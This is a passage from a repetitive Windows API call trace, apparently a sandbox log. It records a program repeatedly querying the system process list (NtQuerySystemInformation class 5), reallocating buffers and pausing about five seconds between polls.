returned 0x0 [0227.433] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.434] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.436] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.436] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.437] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.437] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.437] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.440] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.441] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.443] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.443] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.444] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.444] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.444] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.448] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.449] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.450] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.450] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.451] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.451] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.451] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.455] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.456] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.457] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.458] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.458] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.458] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.459] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.462] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.463] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.464] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.465] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.465] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.465] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.465] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.469] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.470] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.471] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.471] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.472] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.472] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.472] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.478] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.478] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.480] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.480] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.481] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.481] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.481] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.485] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.485] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.489] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.489] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.490] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.490] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.490] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.493] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.494] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.496] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.496] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.497] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.497] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.497] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.500] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.501] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.502] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.503] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.503] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.503] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.503] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.507] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.508] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.510] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.510] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.510] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.511] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.511] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.514] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.515] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.516] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.517] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.517] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.518] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.518] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.521] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.522] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.524] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.524] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.525] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.525] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.525] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.529] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.530] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.531] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.532] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.533] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.533] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.533] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.537] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.537] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.539] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.539] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.539] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.540] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.540] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.543] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.544] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.546] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.546] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.547] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.547] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.547] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.551] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.551] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.554] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.554] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.554] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.555] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.555] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.558] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.559] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.560] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.560] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.561] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.561] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.561] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.565] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.566] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.568] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.569] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.569] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.570] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.570] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.573] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.574] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.576] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.576] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.577] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.577] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.577] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.581] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.582] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.583] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.583] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.584] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.584] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, 